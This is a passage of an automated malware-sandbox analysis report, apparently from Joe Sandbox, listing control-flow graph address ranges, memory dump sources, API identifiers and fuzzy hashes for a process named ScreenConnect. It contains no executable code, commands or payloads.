                                                                                                                                                                                                                                                                    control_flow_graph 512 7ffaac770135-7ffaac77013d 513 7ffaac770140-7ffaac77014d 512->513 514 7ffaac77013f 512->514 515 7ffaac770150-7ffaac770157 513->515 516 7ffaac77014f 513->516 514->513 517 7ffaac770158-7ffaac770167 515->517 516->515 518 7ffaac770170-7ffaac770179 517->518 519 7ffaac770169-7ffaac77016f 517->519 520 7ffaac77017b-7ffaac77017c 518->520 521 7ffaac770183-7ffaac7701aa 518->521 520->521 521->517 524 7ffaac7701ac-7ffaac7701be 521->524 526 7ffaac7701c0-7ffaac7701f6 524->526 527 7ffaac770208-7ffaac770230 524->527 532 7ffaac770254-7ffaac77026c 527->532 533 7ffaac770232-7ffaac770251 527->533 536 7ffaac770290-7ffaac7702ae 532->536 537 7ffaac77026e-7ffaac77028d 532->537 533->532 542 7ffaac7702b0-7ffaac7702c0 536->542 543 7ffaac7702ca 536->543 537->536 546 7ffaac7702c7-7ffaac7702c8 542->546 545 7ffaac7702cf-7ffaac7702d5 543->545 547 7ffaac77036e-7ffaac770371 545->547 548 7ffaac7702db-7ffaac7702e4 545->548 546->543 549 7ffaac7703c8 547->549 550 7ffaac770373-7ffaac77037d 547->550 551 7ffaac7702fd-7ffaac770308 548->551 552 7ffaac7702e6-7ffaac7702f3 548->552 555 7ffaac7703ca-7ffaac7703e6 549->555 558 7ffaac770385-7ffaac77039e 550->558 553 7ffaac77030a-7ffaac770327 551->553 554 7ffaac770354-7ffaac770362 551->554 552->551 557 7ffaac7702f5-7ffaac7702fb 552->557 561 7ffaac77032d-7ffaac770352 553->561 562 7ffaac770612-7ffaac77063a 553->562 554->555 563 7ffaac770364-7ffaac770368 554->563 576 7ffaac770530-7ffaac77054e 555->576 577 7ffaac7703ea-7ffaac7703f6 555->577 557->551 570 7ffaac7703a0-7ffaac7703a2 558->570 571 7ffaac77040f-7ffaac77041a 558->571 561->554 574 7ffaac77063c-7ffaac77066f 562->574 575 7ffaac7705e8 562->575 563->547 567 7ffaac7705ed-7ffaac77060f 563->567 567->562 578 7ffaac77041e-7ffaac77042a 570->578 579 7ffaac7703a4 570->579 580 7ffaac77041b-7ffaac77041c 571->580 603 7ffaac770671-7ffaac77067a 574->603 604 7ffaac77067b-7ffaac770682 574->604 575->567 576->567 606 7ffaac770554-7ffaac77055e 576->606 582 7ffaac7703fc-7ffaac77040a 577->582 583 7ffaac7703f8-7ffaac7703fa 577->583 585 7ffaac770430-7ffaac770431 578->585 586 7ffaac77042c-7ffaac77042e 578->586 579->577 584 7ffaac7703a6-7ffaac7703aa 579->584 580->578 589 7ffaac77040d-7ffaac77040e 582->589 583->589 584->580 590 7ffaac7703ac-7ffaac7703b1 584->590 593 7ffaac770432-7ffaac77043e 585->593 592 7ffaac770441-7ffaac770445 586->592 589->571 590->593 597 7ffaac7703b3-7ffaac7703be 590->597 595 7ffaac770446-7ffaac77045e 592->595 593->592 608 7ffaac770460-7ffaac770462 595->608 609 7ffaac770464-7ffaac770472 595->609 601 7ffaac7703c0-7ffaac7703c5 597->601 602 7ffaac77042f 597->602 601->595 607 7ffaac7703c7 601->607 602->585 612 7ffaac77068e-7ffaac7706b3 604->612 613 7ffaac770684-7ffaac77068d 604->613 610 7ffaac770560-7ffaac770562 606->610 611 7ffaac770564-7ffaac770572 606->611 607->549 614 7ffaac770475-7ffaac770492 608->614 609->614 615 7ffaac770575-7ffaac770592 610->615 611->615 626 7ffaac7706b5-7ffaac7706fa 612->626 622 7ffaac770498-7ffaac7704a6 614->622 623 7ffaac770494-7ffaac770496 614->623 624 7ffaac770598-7ffaac7705a6 615->624 625 7ffaac770594-7ffaac770596 615->625 628 7ffaac7704a9-7ffaac7704bf 622->628 623->628 629 7ffaac7705a9-7ffaac7705c6 624->629 625->629 640 7ffaac7706fc-7ffaac7706fd 626->640 641 7ffaac7706a8-7ffaac7706b3 626->641 636 7ffaac7704c1-7ffaac7704d4 628->636 637 7ffaac7704d6-7ffaac7704dd 628->637 638 7ffaac7705cc-7ffaac7705da 629->638 639 7ffaac7705c8-7ffaac7705ca 629->639 636->637 647 7ffaac7704fd-7ffaac770500 636->647 646 7ffaac7704e4-7ffaac7704f7 637->646 642 7ffaac7705dd-7ffaac7705e6 638->642 639->642 643 7ffaac7706ff-7ffaac770711 640->643 641->626 642->575 648 7ffaac770716-7ffaac77071d 643->648 646->647 649 7ffaac770517-7ffaac77052a 647->649 650 7ffaac770502-7ffaac770515 647->650 649->576 650->576 650->649
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 6
                                                                                                                                                                                                                                                                    • API String ID: 0-1452363761
                                                                                                                                                                                                                                                                    • Opcode ID: 4a1e186b8524eb79f8cb42b5df9275cb3f5c3b9a74f69130c480c4e10452d118
                                                                                                                                                                                                                                                                    • Instruction ID: 44c75202403859720fd1a605a7e2b587c81ebc94dc98218f690a330e0559723e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4a1e186b8524eb79f8cb42b5df9275cb3f5c3b9a74f69130c480c4e10452d118
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C2125971A1EB5E8FF799D72C8455AB53BE1EF5A300F1480B9E44EC7193DD28E84A8381

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 652 7ffaac7758f1-7ffaac775924 call 7ffaac774070 call 7ffaac770960 * 2 660 7ffaac7766be-7ffaac7766d1 652->660 661 7ffaac77592a-7ffaac775938 652->661 663 7ffaac77593e-7ffaac77594d 661->663 664 7ffaac77593a-7ffaac77593c 661->664 665 7ffaac775950-7ffaac775952 663->665 664->665 667 7ffaac775958-7ffaac775974 665->667 668 7ffaac775a92-7ffaac775a95 665->668 667->668 692 7ffaac77597a-7ffaac77598c 667->692 669 7ffaac775bd0-7ffaac775bd7 668->669 670 7ffaac775a9b-7ffaac775aa6 668->670 671 7ffaac775bdd-7ffaac775be4 669->671 672 7ffaac775c67-7ffaac775c6e 669->672 673 7ffaac775aa8-7ffaac775ab3 670->673 674 7ffaac775af2-7ffaac775b00 670->674 671->672 677 7ffaac775bea-7ffaac775bf4 671->677 679 7ffaac775c70-7ffaac775c77 672->679 680 7ffaac775c79-7ffaac775c8c 672->680 681 7ffaac775a7f-7ffaac775a90 673->681 682 7ffaac775ab5-7ffaac775ac5 673->682 674->669 684 7ffaac775cb6-7ffaac775cbd 677->684 696 7ffaac775bfa-7ffaac775c2f 677->696 679->680 679->684 693 7ffaac775c8e-7ffaac775c93 680->693 694 7ffaac775c9d-7ffaac775ca5 680->694 681->668 695 7ffaac775a68-7ffaac775a78 681->695 690 7ffaac7766db-7ffaac7766ec 682->690 691 7ffaac775acb-7ffaac775af0 682->691 688 7ffaac775f21-7ffaac775f28 684->688 689 7ffaac775cc3-7ffaac775cca 684->689 688->660 698 7ffaac775f2e-7ffaac775f35 688->698 689->688 697 7ffaac775cd0-7ffaac775cd3 689->697 735 7ffaac7766ed-7ffaac7766fe 690->735 691->674 699 7ffaac77598e-7ffaac77599a 692->699 700 7ffaac7759da-7ffaac7759ea 692->700 693->694 702 7ffaac776711-7ffaac776756 694->702 703 7ffaac775cab-7ffaac775caf 694->703 695->681 696->672 705 7ffaac775cdc-7ffaac775cea 697->705 706 7ffaac775cd5-7ffaac775cd7 697->706 698->660 709 7ffaac775f3b-7ffaac775f4d 698->709 699->700 772 7ffaac776758-7ffaac7767aa 702->772 703->684 730 7ffaac775cee 705->730 731 7ffaac775cec 705->731 713 7ffaac775d8a-7ffaac775d8d 706->713 715 7ffaac775f4f-7ffaac775f6c 709->715 716 7ffaac775f99-7ffaac775fa8 709->716 717 7ffaac775d8f-7ffaac775d91 713->717 718 7ffaac775d96-7ffaac775da4 713->718 724 7ffaac7766ff-7ffaac776710 715->724 725 7ffaac775f72-7ffaac775f97 715->725 716->660 726 7ffaac775e45-7ffaac775e4b 717->726 743 7ffaac775da8 718->743 744 7ffaac775da6 718->744 724->702 725->716 737 7ffaac775e51-7ffaac775e53 726->737 738 7ffaac775efd-7ffaac775eff 726->738 733 7ffaac775cf0-7ffaac775cf3 730->733 731->733 740 7ffaac775cfd-7ffaac775d08 733->740 741 7ffaac775cf5-7ffaac775cfb 733->741 735->724 737->738 739 7ffaac775e59-7ffaac775e8d 737->739 738->688 745 7ffaac775f01-7ffaac775f09 738->745 739->738 749 7ffaac775d0a-7ffaac775d27 740->749 750 7ffaac775d54-7ffaac775d60 740->750 748 7ffaac775d78-7ffaac775d88 741->748 752 7ffaac775daa-7ffaac775dad 743->752 744->752 745->688 755 7ffaac775f0b-7ffaac775f1d 745->755 748->713 749->735 764 7ffaac775d2d-7ffaac775d52 749->764 750->748 758 7ffaac775daf-7ffaac775db5 752->758 759 7ffaac775db7-7ffaac775dc2 752->759 755->688 766 7ffaac775e33-7ffaac775e43 758->766 767 7ffaac775e0e-7ffaac775e30 759->767 768 7ffaac775dc4-7ffaac775dcf 759->768 764->750 766->726 767->766 768->767 785 7ffaac7767ac-7ffaac7767ad 772->785 786 7ffaac7767af-7ffaac7767d1 785->786
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 6
                                                                                                                                                                                                                                                                    • API String ID: 0-1452363761
                                                                                                                                                                                                                                                                    • Opcode ID: 5cf09f2a636cdb8f726c7e9e0d850485863ee8462794293b6a11475b2b0ebfd1
                                                                                                                                                                                                                                                                    • Instruction ID: 20b29353b053db9af9e7d609693b3a947fc3348b1a1feede52c9c6bec6147ebf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cf09f2a636cdb8f726c7e9e0d850485863ee8462794293b6a11475b2b0ebfd1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27E1222191DA6FCBFEE9972884556B437E1EF52300F5881B9D84EC75C7DE28E80A87C1

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 810 7ffaac463642-7ffaac485caa 813 7ffaac485cac-7ffaac485cb1 810->813 814 7ffaac485cb4-7ffaac485d71 CreateNamedPipeW 810->814 813->814 816 7ffaac485d79-7ffaac485dac 814->816 817 7ffaac485d73 814->817 817->816
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3164918389.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac460000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: CreateNamedPipe
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2489174969-0
                                                                                                                                                                                                                                                                    • Opcode ID: 65293140e445c8b372aecb85c762e861d089ee192d0151127c0f893103def85b
                                                                                                                                                                                                                                                                    • Instruction ID: a97e456446fc36d3aabe61b33f646c1adada5ec8dc19184906ce818a355d7432
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 65293140e445c8b372aecb85c762e861d089ee192d0151127c0f893103def85b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C51917191CA1C8FDB68EF58D845BE9B7E0FB59710F1082AEE04ED3241CB70A9858BC1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 74962dc666a662d3f6f75168a5b3d6b12a39da154d09319da5fbda8f9162da2a
                                                                                                                                                                                                                                                                    • Instruction ID: 59dd8f122e75c61563a13c905877e7d32fa183e1f059c5ae207db5418a507f57
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74962dc666a662d3f6f75168a5b3d6b12a39da154d09319da5fbda8f9162da2a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24120635E1AA6ECFFB95D7288455AB973E1EF86304F548079D44EC31D6DE28E80983C1

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                    control_flow_graph 271 7ffaac774459-7ffaac77446a 272 7ffaac77446c-7ffaac7744a6 271->272 273 7ffaac774418-7ffaac77441a 271->273 283 7ffaac7744a8-7ffaac7744c7 272->283 284 7ffaac7744c9-7ffaac774513 272->284 275 7ffaac77441c-7ffaac774426 273->275 276 7ffaac774428 273->276 277 7ffaac77442d-7ffaac77442f 275->277 276->277 279 7ffaac774431-7ffaac774434 277->279 280 7ffaac774436-7ffaac77443a 277->280 281 7ffaac774441 279->281 280->281 285 7ffaac774446-7ffaac774457 281->285 283->284 294 7ffaac77451d-7ffaac774525 284->294 295 7ffaac774515-7ffaac774516 284->295 295->294
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: /$/
                                                                                                                                                                                                                                                                    • API String ID: 0-972056843
                                                                                                                                                                                                                                                                    • Opcode ID: 2ec2c9cad42bdca017f1d83914bb4c7c4b8888e28a792e16d6849ffdc588ff7f
                                                                                                                                                                                                                                                                    • Instruction ID: 256b52f766edc011344f04489a942694da67a471bef47e2694e9485d8403a308
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ec2c9cad42bdca017f1d83914bb4c7c4b8888e28a792e16d6849ffdc588ff7f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4731F511E0EA6E8BF7A4A7689895274A6E1FF56300F4485BAD41DC32C3ED58EC5887C1

                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3164918389.00007FFAAC460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC460000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac460000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: MitigationPolicyProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 1088084561-0
                                                                                                                                                                                                                                                                    • Opcode ID: ecd7fe92970a5c6b5921474c13dbfde3d46a3674ec524d6b93df63091420bf30
                                                                                                                                                                                                                                                                    • Instruction ID: f71c40547a2f54a4cf0a9dc544977dd09463cbdf3e9ee03ba7183f4f89dc16ed
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecd7fe92970a5c6b5921474c13dbfde3d46a3674ec524d6b93df63091420bf30
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E5513C7181CB498FE7159FA8D84A5E9BBF0EF56310F04417EE089C3192DF68A84AC7D1
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: 6
                                                                                                                                                                                                                                                                    • API String ID: 0-1452363761
                                                                                                                                                                                                                                                                    • Opcode ID: 48803b658607585e4afeab56c17028a7670f405ac467f0864cb51519d247369f
                                                                                                                                                                                                                                                                    • Instruction ID: 1c3c0f629ae1c94202099a5500950089094acaaf701dba916aced3ec6c9e200e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48803b658607585e4afeab56c17028a7670f405ac467f0864cb51519d247369f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B517B5194D69B8BFE956B78D461AF43BA0DF03314F0885B9D08ECA1D7CD1CE84E8382
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 0ea0a9cac0fe1826ee0ba73fde28635891e5771848c8b59649ebea7789c0b2d9
                                                                                                                                                                                                                                                                    • Instruction ID: ee7e721e76124b859f621fd35946a5e952756041f456c9524d47e540199b86ad
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ea0a9cac0fe1826ee0ba73fde28635891e5771848c8b59649ebea7789c0b2d9
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBC1297291EA6A9BFB69D728C8428B537E0FF52350B14817DE44E87583ED14F80E8BC1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 681386f85793cc5297b75e2a79545599af041cf6c148370acfc78a95958b4ff4
                                                                                                                                                                                                                                                                    • Instruction ID: 298efa635eb9d3f1f3e90f0eac2a290e997e39999782c06732f4274e9bf01298
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 681386f85793cc5297b75e2a79545599af041cf6c148370acfc78a95958b4ff4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF71C867D4E2A69BF352A77CA8654F57FB0DF5326470881B3D0CCCA1A3E908684E87D1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: a9bad1e4c6de19a5471a975f6edf0139c29d99e855b6f12d5a397ce2c32b7550
                                                                                                                                                                                                                                                                    • Instruction ID: cddb0adb718e6f7d24add66cc972e0718047ea111e32a569264376aecb5779d9
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9bad1e4c6de19a5471a975f6edf0139c29d99e855b6f12d5a397ce2c32b7550
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45817935E1A92FCBFB99D7248055AB972F2EF96304F54C439D40EC31CADE29E84986D0
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 56c70d8bd0b74d4ef28dab076f012efe9431fa397c452cbea4d0c88f4a75f127
                                                                                                                                                                                                                                                                    • Instruction ID: e1e185cf079ecdf0c5e7a2a5ac3cf86aef7ead505a2dad57c7d8de0c84a313a1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56c70d8bd0b74d4ef28dab076f012efe9431fa397c452cbea4d0c88f4a75f127
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AB613372A0EE9DCBFB659768D8554A93BF1EF96310F08817AD00DD3592DE24E80A87C1
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: de844d7ce5e11d58138dda1d7150a38277a19ecfb1ef0636d014247f8b6c0b23
                                                                                                                                                                                                                                                                    • Instruction ID: 51adecac940e8f6fcaf9bbf89cd8c42e923c56b01f2aa11888005db2393c331c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de844d7ce5e11d58138dda1d7150a38277a19ecfb1ef0636d014247f8b6c0b23
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D617F74618A4ECFEF88DF18C894AA537F1FF69314B1442A9D41EC7296CB35E846CB81
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 56c2e92eb8aff192e0e20d61b2afb6c784efc06b0e31c72a42a1337af4ce162d
                                                                                                                                                                                                                                                                    • Instruction ID: c257ac8e311c130a49bd046adb3db6887a5bcc2ff837badfb2d4fcbc8bcbf3d3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56c2e92eb8aff192e0e20d61b2afb6c784efc06b0e31c72a42a1337af4ce162d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1611334609A498FDBDCEF18C094AA577F2FF99304B2445A8D01DCF69BCA25E847CB80
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 3fd56acec0c61e1ca3dc5a8ae92cdb9025d9fc49fd39e8954333a50c89cba3a1
                                                                                                                                                                                                                                                                    • Instruction ID: a59f16c97000fcc4286b90b109917f9c7619fdf60eab43df2d7f115a8d353239
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3fd56acec0c61e1ca3dc5a8ae92cdb9025d9fc49fd39e8954333a50c89cba3a1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B251D871A1CA99CFEF88DF28C455A6577E1FF55300F0841A8D45ECB687DE25EC068B80
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 81918a064a70f95a9fbc6fb7cacc8e1bf21254335b4081ec61a93357d400c4ed
                                                                                                                                                                                                                                                                    • Instruction ID: 78157b3ab56116714f74b71cbd0e1bc0308a2786b72e3cc62eb279c11ad9dc10
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 81918a064a70f95a9fbc6fb7cacc8e1bf21254335b4081ec61a93357d400c4ed
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5A41D762D0E7AE8FF7559368881A5B87FB0EF53240B19C5F6C44DCB993DE18E8094781
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2da7d4a93d57cb42f351ba1326d662f8b0e25fddafe05919c4fa6e07ec90d83d
                                                                                                                                                                                                                                                                    • Instruction ID: d81ae0760cd93f443ad0b9aa0d96431c42310062355ff6081071db2a97da9828
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2da7d4a93d57cb42f351ba1326d662f8b0e25fddafe05919c4fa6e07ec90d83d
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D331F572E1EE6D8BFB95876898211F83BF0EF46314F0441A6E55CE35C2DB19D80586C6
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 0000000A.00000002.3172719511.00007FFAAC770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC770000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_7ffaac770000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2bbde006314dc1692b2b6f00904a97a25bbc366563d34730f7c7d1e9d09f93ec
                                                                                                                                                                                                                                                                    • Instruction ID: 716d01b8b329d388770e85b41a8c13373fe82e5a679f7008da560ea927548c0f
